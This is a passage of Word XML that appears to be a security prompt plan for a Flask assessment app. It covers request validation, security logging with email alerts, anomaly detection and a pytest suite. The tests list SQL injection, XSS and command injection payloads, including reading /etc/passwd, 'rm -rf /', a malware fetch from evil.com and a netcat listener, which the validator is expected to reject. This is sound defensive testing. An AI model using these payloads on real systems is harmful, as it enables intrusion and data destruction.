      </w:r>
    </w:p>
    <w:p w14:paraId="0FED11E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r"onerror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="</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D56BF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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9CC04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4A88FE7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for pattern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suspicious_patterns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04970E8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re.search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(pattern, value,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re.IGNORECASE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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3215D93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True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3BE4D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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C699E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50AA9D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API validation decorator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4522EAD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validate_api_request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(f):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6798CB8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@wraps(f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC47FB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decorated_function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(*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args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**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kwargs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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C65480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validator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APIValidator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0488402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validation_result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validator.validate_request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7A12FB4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453DBE9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not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validation_result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["valid"]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC54F8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log_security_event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("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api_validation_failure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", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6889532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g.get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 'anonymous'),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7748AA8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{"reason":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validation_result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["reason"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C209C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 "endpoint":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request.endpoint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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FEEFE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4645BF5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jsonify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({"error": "Invalid request"}),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validation_result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["code"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC956D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5314B2A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f(*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args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**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kwargs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5C17380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decorated_function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01CDC362" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="00400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Integration Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCD41B8" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Apply rate limiting to all assessment endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565F15BF" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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API validation to all public endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D2326E" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Monitor rate limit violations for abuse patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E56AF8" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Integrate with existing Flask error handlers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4645911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DC403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Prompt S5: Security Monitoring and Logging (HIGH PRIORITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D98CA3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**Dependencies:** Prompts S1-S4 completed  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09933FA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**Estimated Time:** 45-60 minutes  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FCE98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**Files Created:** `backend/security/security_monitor.py`, `backend/security/alert_system.py`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31983C1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46C415" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="00400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comprehensive security monitoring for assessment system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDD1F2A" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Security Event Logging System:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7701574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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="097F75B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import logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D4162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from datetime import datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58625E6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from flask import request, g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CCBB6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typing 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Any, Optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593D854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smtplib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="282DE29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email.mime.text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MIMEText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="035B45E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email.mime.multipart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MIMEMultipart</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5F95707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308F60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SecurityMonitor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09D4229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__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A40F5B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self.setup_security_logger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191E868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self.alert_thresholds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431B773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failed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_logins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{'count': 5, 'window': 300},  # 5 in 5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBA5C5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injection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_attempts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{'count': 3, 'window': 300},  # 3 in 5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B74D9B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_limit_violations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{'count': 10, 'window': 600}  # 10 in 10 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD1C54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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2689453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7B318A2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setup_security_logger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368DC9F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self.security_logger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logging.getLogger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('security')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7889F3C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self.security_logger.setLevel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(logging.INFO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5AEEF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3E8E5E5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File handler for security events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C6C71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handler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logging.FileHandler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('/secure/logs/security_events.log')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D084C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formatter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logging.Formatter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</w:p>
    <w:p w14:paraId="54820AB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'%(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asctime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)s - %(name)s - %(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levelname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)s - %(message)s'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE24BE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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5386979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handler.setFormatter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(formatter)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7237F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self.security_logger.addHandler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(handler)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D932A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147A091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log_security_event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str,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user_identifier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str, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BC777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details: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[str, Any], severity: str = 'INFO'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613F4F6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54D6912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'timestamp':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datetime.utcnow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().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isoformat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(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468AE0A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DA3B7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_identifier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user_identifier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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47273BC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'severity': severity,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472D70C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ip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_address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request.remote_addr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if request else 'unknown',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354C453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_agent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request.headers.get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('User-Agent') if request else 'unknown',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A07BD9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'endpoint':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request.endpoint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if request else 'unknown',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26016B0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'method':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request.method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if request else 'unknown',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F73BA3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'details': details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BBC58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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F963F1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41FFF84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Log the event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E587C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log_message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json.dumps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6797978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severity == 'CRITICAL':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9D81B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self.security_logger.critical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log_message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5E85471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elif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severity == 'WARNING':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A05AE8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self.security_logger.warning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log_message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0706259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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DD384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self.security_logger.info(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log_message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6EC4992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0734C1E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if alert should be triggered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFF156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self._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check_alert_thresholds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0DE4040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F7A651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event_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15841AB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08009FC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check_alert_thresholds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str,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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFED7A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Map event types to threshold categories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA4289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threshold_mapping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5DB6EE0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auth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_failure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failed_logins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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD7021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sql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_injection_attempt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injection_attempts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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C794F3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xss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_attempt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injection_attempts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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E065F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_limit_exceeded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rate_limit_violations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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB49A0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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8614E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18DD90C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threshold_key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threshold_mapping.get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0708037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not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threshold_key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597A295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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9126D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18C6C2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threshold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self.alert_thresholds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threshold_key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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631D469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52AF54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Count recent events of this type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C11D6B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recent_count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self._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count_recent_events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threshold['window'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23668CB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3031DDD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recent_count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&gt;= threshold['count']:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041951C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self._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trigger_security_alert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recent_count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5A625D9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0AAD22B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count_recent_events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str,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window_seconds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int) -&gt; int:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1A0E3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In production, this would query a proper logging database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A11DB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For now, we'll use a simple Redis counter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FEC4D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key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f"security_events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}:{int(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() //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window_seconds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)}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D306A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int(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self.redis_client.get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(key) or 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B359F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758F00A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trigger_security_alert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str,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count: int):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1972D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alert_data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0D57905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alert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'SECURITY_THRESHOLD_EXCEEDED',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7348A16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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44650A2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'count': count,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7342EE8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'timeframe':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self.alert_thresholds.get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{}).get('window', 300),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C6918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latest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event_data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01C8EC7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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14253D1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3A598B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Send alert email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E06A8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self._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send_security_alert_email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alert_data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666403A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25EDF1F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Log the alert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3469779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self.security_logger.critical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f"SECURITY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ALERT: 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json.dumps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alert_data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)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1CA46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EDCF6F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SecurityAlerter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5DFC186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__(self,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smtp_host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str,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smtp_port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int, username: str, password: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B40449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self.smtp_host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smtp_host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B94184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self.smtp_port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smtp_port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B74BB0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self.username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username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2836F35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self.password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password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F21887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self.alert_recipients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['security@mingus.com', 'admin@mingus.com']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247C80B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5761C2C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send_security_alert_email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alert_data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[str, Any]):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C79C97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subject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f"MINGUS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Security Alert - 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alert_data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']}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4731F80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303ECD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body = f"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A0FF7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SECURITY ALERT TRIGGERED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4374730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56CEF3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Event Type: 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alert_data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']}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F21E28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Count: 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alert_data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['count']} events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB3A5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Timeframe: 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alert_data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['timeframe']} seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF90BE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64A1B5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Latest Event Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4407DFE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- Timestamp: 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alert_data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latest_event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']['timestamp']}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D26629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- IP Address: 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alert_data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latest_event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ip_address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']}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A0E60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- User Agent: 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alert_data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latest_event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user_agent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']}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA4F2E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- Endpoint: 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alert_data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latest_event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']['endpoint']}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320784C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57C84E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Please investigate immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750372D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205AD6D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57F1ADE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msg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MIMEMultipart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6DA8898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msg['From']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self.username</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75B0AC0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msg['Subject'] = subject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C4540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msg.attach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MIMEText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(body, 'plain'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D7342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05F99AB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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AFFA7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server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smtplib.SMTP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self.smtp_host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self.smtp_port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2128D81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server.starttls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36F5AB1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server.login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self.username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self.password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09B0691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4FBB8C5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for recipient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self.alert_recipients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6904A7C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msg['To'] = recipient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A6190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server.send_message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(msg)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691BB65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del msg['To']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672E8DC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</w:p>
    <w:p w14:paraId="00010BC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server.quit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432D323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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EB99C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# Log email sending failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647676E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logging.error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f"Failed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to send security alert email: {str(e)}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC4413" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Anomaly Detection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648C63A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numpy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as np</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D87DF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datetime import datetime,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timedelta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2466888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typing import List,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Any</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C90D50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B4823B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AnomalyDetector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098DE3B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__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2366AA7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self.baseline_window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7  # days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A68B2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self.anomaly_threshold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2.5  # standard deviations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7434E43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2C238FF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detect_assessment_anomalies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str,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 -&gt; List[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]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B56879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anomalies = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719C80A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1C01380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completion time anomaly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CE390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completion_time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assessment_data.get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completion_time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 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036ECA5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avg_completion_time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self._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get_average_completion_time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['type'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C561F5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1EFD000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completion_time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avg_completion_time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0.1:  # Suspiciously fast</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF6176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anomalies.append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({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEDB47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'type':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suspiciously_fast_completion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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233153C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'value':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completion_time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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3668FB8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expected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_range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f"{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avg_completion_time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0.5}-{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avg_completion_time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2}",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7487116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'severity': 'HIGH'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB3C40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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17744D7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3CD5B2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answer pattern anomalies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582E971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answers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assessment_data.get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('responses', {})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6863B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self._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has_suspicious_answer_pattern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(answers):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C5589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anomalies.append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({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE36F4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'type':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suspicious_answer_pattern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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4631681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'details': 'Repetitive or random answer pattern detected',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7072032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'severity': 'MEDIUM'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EFEB1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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1B08B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B29CD6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anomalies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBB18D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5DB4607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get_average_completion_time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str) -&gt; float:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE4D0A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Query database for average completion times</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44265FD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This would be replaced with actual database query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F371FE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average_times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50CFE39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ai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_job_risk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240,      # 4 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525B0FA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relationship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_impact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300,  # 5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A74D79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tax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_impact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180,       # 3 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F802FE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income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_comparison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210  # 3.5 minutes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BA552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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E62C29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average_times.get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240)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD0F95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54FB806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has_suspicious_answer_pattern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answers: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Dict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 -&gt; bool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7A205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values = list(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answers.values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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B36E46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23E3F0A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for all identical answers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A93C58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(set(str(v) for v in values)) == 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120CBE5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return True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEF707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35BA630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for sequential patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A76605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numeric_values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[v for v in values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isinstance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(v, (int, float))]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5B683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numeric_values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 &gt;= 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB9C1B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differences = [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numeric_values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[i+1] -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numeric_values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] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7448C0F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for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in range(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numeric_values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)-1)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261F0AB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(set(differences)) == 1 and differences[0] != 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEAB94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return True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD234A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2D3BBBE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False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A515DD" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="00400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Integration Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4344A3EA" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Integrate security logging with all authentication and validation functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B511FAD" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Set up automated security alerts for critical events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3238F741" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Connect anomaly detection to assessment submission process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E72566C" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Configure secure log storage with appropriate retention policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136A56F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96DA2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Prompt S6: Security Testing and Validation (HIGH PRIORITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433C129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**Dependencies:** All security prompts completed  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A2E20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**Estimated Time:** 90-120 minutes  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC6344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**Files Created:** Multiple security test files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D187A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4DDA1F" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="00400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comprehensive security test suite for assessment system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B5C9E8" w14:textId="77777777" w:rsidR="004007AE" w:rsidRPr="004007AE" w:rsidRDefault="004007AE" w:rsidP="004007A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Input Validation Security Tests:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360F797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pytest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0AB375D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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21BC9F0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backend.security.input_validator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SecurityValidator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validate_assessment_input</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5C2CEAC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backend.app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create_app</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42372F4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A1D9AF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TestInputValidation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3CCF16A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setup_method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6FA5CAF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create_app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('testing')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4668DAB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self.app.app_context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3F9CAA0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self.app_context.push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7833A3C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self.validator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SecurityValidator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7020312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1E0AE09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teardown_method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2255D91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self.app_context.pop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52762CF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1AA7988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test_sql_injection_prevention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2A9377F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"""Test SQL injection pattern detection"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="766E216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malicious_inputs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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A049B7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"'; DROP TABLE users; --",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCC709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"1' OR '1'='1",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4708BE7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"admin'; DELETE FROM assessments; --",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357F414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"UNION SELECT password FROM users",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF92D0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"'; EXEC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xp_cmdshell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dir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'); --",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B40F0F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"1';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waitfor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delay '00:00:10'; --"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5567CBA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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FD974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0A2043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malicious_inputs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4288A85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result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self.validator.validate_input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0FAFF7B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assert not result["valid"],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f"Failed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to detect SQL injection: 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}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBDF71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assert "SQL injection" in result["reason"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBD63F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52B07AC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test_xss_prevention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576411A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"""Test XSS pattern detection"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3505B47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malicious_inputs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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EA1F8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"&lt;script&gt;alert('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xss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')&lt;/script&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC8BBD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javascript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:alert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xss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')",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DADE4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"&lt;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src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=x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onerror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=alert('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xss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')&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388D317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"&lt;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iframe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src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javascript:alert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(1)'&gt;&lt;/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iframe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&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF718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"&lt;object data='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javascript:alert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(1)'&gt;&lt;/object&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A2427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"&lt;embed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src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javascript:alert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(1)'&gt;&lt;/embed&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDBEE6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"&lt;link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rel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='stylesheet'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href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javascript:alert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(1)'&gt;",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43568B5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"&lt;meta http-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equiv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='refresh' content='0;url=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javascript:alert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(1)'&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2D385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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D82FD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7B0F03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malicious_inputs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59FCAAB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result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self.validator.validate_input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4D2E6A5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assert not result["valid"],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f"Failed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to detect XSS: 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}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B1DA4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assert "XSS" in result["reason"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A10A83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5C133E6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test_command_injection_prevention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694E7E4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"""Test command injection pattern detection"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034FBA8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malicious_inputs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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B4424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"; ls -la",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325FB18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"| cat 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etc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/passwd",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2B668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"&amp;&amp; rm -rf /",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480A4AD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"$(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whoami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)",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE64AF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"`id`",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D5A67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"; python -c 'import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;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os.system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(\"ls\")'",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5EFAF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"&amp;&amp;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http://evil.com/malware.sh",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCDCAB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"|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nc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-l -p 1234"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E790A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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A5F26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351EE4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malicious_inputs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592EF9E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result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self.validator.validate_input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7A36D4A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assert not result["valid"],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f"Failed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to detect command injection: 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}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24892FE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assert "Command injection" in result["reason"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFEDED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75B8EED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test_valid_inputs_pass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52AED80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"""Test that legitimate inputs pass validation"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A1D05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valid_inputs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[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C19C7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"Software Engineer",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289CC12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"I enjoy working with data analysis",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A9A31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"5 years of experience",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E1B71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"Atlanta, Georgia",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C39C71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"$75,000 annual salary",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F98BAF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"JavaScript and Python programming"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7149733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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D6DF6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3344353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valid_inputs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5ABAB34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result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self.validator.validate_input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477BC5D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assert result["valid"],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f"Valid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input rejected: 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valid_input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}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726295C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B192C7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TestJWTSecurity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1FCABE9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setup_method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3FFEBB5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create_app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('testing')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A66B91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self.app.app_context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41D6E30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self.app_context.push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6BD01DD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2A15B7F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teardown_method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1E3E75B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self.app_context.pop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5D35B24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7006649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@patch('backend.security.auth_security.request')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404D607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test_jwt_validation_with_ip_check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mock_request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</w:t>
